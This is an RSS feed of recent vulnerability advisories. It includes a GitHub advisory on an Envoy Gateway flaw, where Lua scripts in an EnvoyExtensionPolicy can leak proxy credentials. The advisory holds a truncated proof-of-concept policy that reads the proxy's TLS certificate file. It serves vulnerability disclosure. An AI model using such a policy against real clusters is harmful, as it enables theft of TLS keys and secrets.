<?xml version='1.0' encoding='UTF-8'?>
<?xml-stylesheet href="/static/style.xsl" type="text/xsl"?>
<rss xmlns:atom="http://www.w3.org/2005/Atom" xmlns:content="http://purl.org/rss/1.0/modules/content/" version="2.0">
  <channel>
    <title>Most recent entries from all</title>
    <link>https://cve.radiocsirt.org</link>
    <description>Contains only the most 10 recent entries.</description>
    <docs>http://www.rssboard.org/rss-specification</docs>
    <generator>python-feedgen</generator>
    <language>en</language>
    <lastBuildDate>Sat, 03 Oct 2026 16:11:31 +0000</lastBuildDate>
    <item>
      <title>bdu:2026-01040</title>
      <link>https://cve.radiocsirt.org/vuln/bdu:2026-01040</link>
      <description>bdu:2026-01040</description>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/bdu:2026-01040</guid>
    </item>
    <item>
      <title>CLEANSTART-2026-MY21105 — Security fix for CVE-2026-22771 applied in: tigera-operator 1.39.3-r1, tigera-operator-fips 1.37.2-r4</title>
      <link>https://cve.radiocsirt.org/vuln/cleanstart-2026-my21105</link>
      <description>&lt;p&gt;&lt;strong&gt;Affected:&lt;/strong&gt; CleanStart: tigera-operator, CleanStart: tigera-operator-fips&lt;/p&gt;
&lt;p&gt;CVE-2026-22771 affects multiple packages. This issue is resolved in later releases. See references for individual vulnerability details.&lt;/p&gt;</description>
      <content:encoded>&lt;p&gt;&lt;strong&gt;Affected:&lt;/strong&gt; CleanStart: tigera-operator, CleanStart: tigera-operator-fips&lt;/p&gt;
&lt;p&gt;CVE-2026-22771 affects multiple packages. This issue is resolved in later releases. See references for individual vulnerability details.&lt;/p&gt;</content:encoded>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/cleanstart-2026-my21105</guid>
    </item>
    <item>
      <title>EUVD-2026-337496</title>
      <link>https://cve.radiocsirt.org/vuln/euvd-2026-337496</link>
      <description>EUVD-2026-337496</description>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/euvd-2026-337496</guid>
    </item>
    <item>
      <title>fkie_cve-2026-22771</title>
      <link>https://cve.radiocsirt.org/vuln/fkie_cve-2026-22771</link>
      <description>&lt;p&gt;Envoy Gateway is an open source project for managing Envoy Proxy as a standalone or Kubernetes-based application gateway. Prior to 1.5.7 and 1.6.2, EnvoyExtensionPolicy Lua scripts executed by Envoy proxy can be used to leak the proxy&amp;#39;s credentials. These credentials can then be used to communicate with the control plane and gain access to all secrets that are used by Envoy proxy, e.g. TLS private keys and credentials used for downstream and upstream communication. This vulnerability is fixed in 1.5.7 and 1.6.2.&lt;/p&gt;</description>
      <content:encoded>&lt;p&gt;Envoy Gateway is an open source project for managing Envoy Proxy as a standalone or Kubernetes-based application gateway. Prior to 1.5.7 and 1.6.2, EnvoyExtensionPolicy Lua scripts executed by Envoy proxy can be used to leak the proxy&amp;#39;s credentials. These credentials can then be used to communicate with the control plane and gain access to all secrets that are used by Envoy proxy, e.g. TLS private keys and credentials used for downstream and upstream communication. This vulnerability is fixed in 1.5.7 and 1.6.2.&lt;/p&gt;</content:encoded>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/fkie_cve-2026-22771</guid>
    </item>
    <item>
      <title>GHSA-xrwg-mqj6-6m22 — Envoy Extension Policy lua scripts injection causes arbitrary command execution</title>
      <link>https://cve.radiocsirt.org/vuln/ghsa-xrwg-mqj6-6m22</link>
      <description>&lt;p&gt;&lt;strong&gt;Affected:&lt;/strong&gt; Go: github.com/envoyproxy/gateway&lt;/p&gt;
&lt;p&gt;### Impact
Envoy Gateway allows users to create Lua scripts that are executed by Envoy proxy using the `EnvoyExtensionPolicy` resource. Administrators can use Kubernetes RBAC to grant users the ability to create `EnvoyExtensionPolicy` resources. Lua scripts in policies are executed in two contexts:
* An `EnvoyExtensionPolicy` can be attached to Gateway and xRoute resources. Lua scripts in the policy will process traffic in that scope.
* Lua scripts are interpreted and run by the Envoy Gateway controller pod for validation purposes.&lt;/p&gt;
&lt;p&gt;Lua scripts executed by Envoy proxy can be used to leak the proxy&amp;#39;s credentials. These credentials can then be used to communicate with the control plane and gain access to all secrets that are used by Envoy proxy, e.g. TLS private keys and credentials used for downstream and upstream communication.&lt;/p&gt;
&lt;p&gt;For example, the following EnvoyExtensionPolicy, when executed by Envoy proxy, will leak the proxy&amp;#39;s XDS client certificates.&lt;/p&gt;
&lt;p&gt;```yaml
apiVersion: gateway.envoyproxy.io/v1alpha1
kind: EnvoyExtensionPolicy
metadata:
  name: lua-leak
spec:
  targetRefs:
    - group: gateway.networking.k8s.io
      kind: HTTPRoute
      name: leak
  lua:
    - type: Inline
      inline: |
           function envoy_on_response(response_handle)
             local cert = io.open(&amp;#34;/certs/tls.crt&amp;#34;, &amp;#34;r&amp;#34;)
             local content
             if cert then
                content = cert:read(&amp;#34;*all&amp;#34;)
                cert:close()
             else
                content =…&lt;/p&gt;</description>
      <content:encoded>&lt;p&gt;&lt;strong&gt;Affected:&lt;/strong&gt; Go: github.com/envoyproxy/gateway&lt;/p&gt;
&lt;p&gt;### Impact
Envoy Gateway allows users to create Lua scripts that are executed by Envoy proxy using the `EnvoyExtensionPolicy` resource. Administrators can use Kubernetes RBAC to grant users the ability to create `EnvoyExtensionPolicy` resources. Lua scripts in policies are executed in two contexts:
* An `EnvoyExtensionPolicy` can be attached to Gateway and xRoute resources. Lua scripts in the policy will process traffic in that scope.
* Lua scripts are interpreted and run by the Envoy Gateway controller pod for validation purposes.&lt;/p&gt;
&lt;p&gt;Lua scripts executed by Envoy proxy can be used to leak the proxy&amp;#39;s credentials. These credentials can then be used to communicate with the control plane and gain access to all secrets that are used by Envoy proxy, e.g. TLS private keys and credentials used for downstream and upstream communication.&lt;/p&gt;
&lt;p&gt;For example, the following EnvoyExtensionPolicy, when executed by Envoy proxy, will leak the proxy&amp;#39;s XDS client certificates.&lt;/p&gt;
&lt;p&gt;```yaml
apiVersion: gateway.envoyproxy.io/v1alpha1
kind: EnvoyExtensionPolicy
metadata:
  name: lua-leak
spec:
  targetRefs:
    - group: gateway.networking.k8s.io
      kind: HTTPRoute
      name: leak
  lua:
    - type: Inline
      inline: |
           function envoy_on_response(response_handle)
             local cert = io.open(&amp;#34;/certs/tls.crt&amp;#34;, &amp;#34;r&amp;#34;)
             local content
             if cert then
                content = cert:read(&amp;#34;*all&amp;#34;)
                cert:close()
             else
                content =…&lt;/p&gt;</content:encoded>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/ghsa-xrwg-mqj6-6m22</guid>
    </item>
  </channel>
</rss>
